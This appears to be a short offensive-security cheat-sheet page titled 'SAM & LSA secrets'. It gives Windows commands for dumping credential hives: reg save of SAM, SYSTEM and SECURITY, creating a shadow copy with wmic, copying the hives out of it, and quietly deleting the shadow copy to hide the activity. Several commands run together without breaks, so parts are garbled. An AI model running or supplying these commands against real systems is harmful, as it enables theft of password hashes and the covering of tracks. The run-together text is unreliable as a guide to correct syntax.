SAM & LSA secrets
Last updated
Last updated
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
reg save HKLM\SECURITY security.savewmic shadowcopy call create Volume='C:\'vssadmin.exe list shadowscopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\ProgramData\SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY C:\ProgramData\SECURITY
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ProgramData\SYSTEMvssadmin.exe delete shadows /shadow={UUID} /quiet